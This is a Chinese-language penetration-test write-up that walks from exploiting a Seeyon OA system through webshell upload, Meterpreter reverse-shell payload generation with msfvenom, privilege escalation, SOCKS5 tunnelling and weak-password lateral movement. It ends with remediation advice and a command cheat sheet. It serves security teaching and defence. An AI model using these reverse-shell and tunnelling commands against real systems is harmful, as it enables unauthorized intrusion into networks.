渗透测试:从Web到内网
字数 1091 2025-08-03 16:43:00
渗透测试:从Web到内网实战指南
前言
本文记录了一次完整的渗透测试过程,从Web应用漏洞利用到内网横向移动,最终获取多台内网服务器权限的实战案例。
一、Web应用突破口
1.1 目标系统识别
- 目标系统:致远OA系统
- 特点:已知存在多个公开漏洞,网上有丰富的复现资料
1.2 漏洞利用
- 使用自定义开发的OA系统EXP工具进行攻击
- 上传Webshell(冰蝎马)获取初始立足点
- 冰蝎连接成功,获得系统交互式shell
二、权限提升与信息收集
2.1 远程桌面服务检查
tasklist /svc | find "Ter" # 检查TermService(RDP)是否运行
netstat -ano|findstr "3308" # 查找RDP服务监听端口
发现RDP服务运行但无法连接,可能原因:
- 远程桌面服务未开启
- 更改了默认端口
- 仅限内网访问
2.2 Meterpreter会话建立
使用MSF生成payload并上线:
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<端口> -f exe -o /root/vhs.exe
MSF监听设置:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost <监听IP>
set lport <监听端口>
exploit
2.3 权限提升
- 初始权限:普通用户
- 使用MSF默认提权模块成功获取SYSTEM权限
三、内网横向移动
3.1 隧道搭建
- 使用开源工具NPS搭建SOCKS5代理隧道
- 通过proxychains连接隧道,使攻击机IP变为目标内网IP
3.2 内网RDP连接
通过隧道成功连接内网远程桌面服务
3.3 内网主机发现
使用批处理命令扫描内网存活主机:
for /l %i in (1,1,255) do @ping 192.168.*.%i -w 1 -n 1 | find /i "ttl"
结果分析:
- TTL=128:Windows系统
- TTL=64:Linux系统
- TTL=255:可能是路由器或网络设备
3.4 内网渗透成果
-
Linux服务器:
- 通过SSH连接(IP: 192.168..103, 192.168..108)
- 弱口令:123456789
-
Windows服务器:
- 多台服务器存在相同弱口令:123456789
-
后台管理系统:
- 发现两个内网管理系统
- 同样存在弱口令问题
四、修复建议
-
OA系统:
- 及时更新补丁,修复已知漏洞
- 限制文件上传功能
-
密码策略:
- 禁止使用简单弱口令
- 实施复杂度要求(大小写字母、数字、特殊字符组合)
- 定期更换密码
-
网络隔离:
- 加强内外网隔离
- 限制RDP等服务的访问范围
-
监控措施:
- 部署入侵检测系统
- 监控异常登录行为
五、技术要点总结
-
Web突破:
- 熟悉常见OA系统漏洞
- 掌握Webshell上传与连接技术
-
权限维持:
- Meterpreter会话建立
- 多种提权方法
-
内网横向:
- 隧道技术(SOCKS5)
- 内网主机发现技巧
- TTL值分析系统类型
-
密码安全:
- 避免内网系统使用相同密码
- 禁用常见弱口令
附录:常用命令速查
-
服务检查:
tasklist /svc | find "Ter" # 检查TermService netstat -ano # 查看所有网络连接 -
内网扫描:
for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl" -
MSF生成Payload:
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe -
隧道连接:
proxychains <command> # 通过SOCKS隧道执行命令
本案例展示了从外网渗透到内网横向的完整流程,强调了内网系统密码安全的重要性,即使是内网系统也应实施严格的安全策略。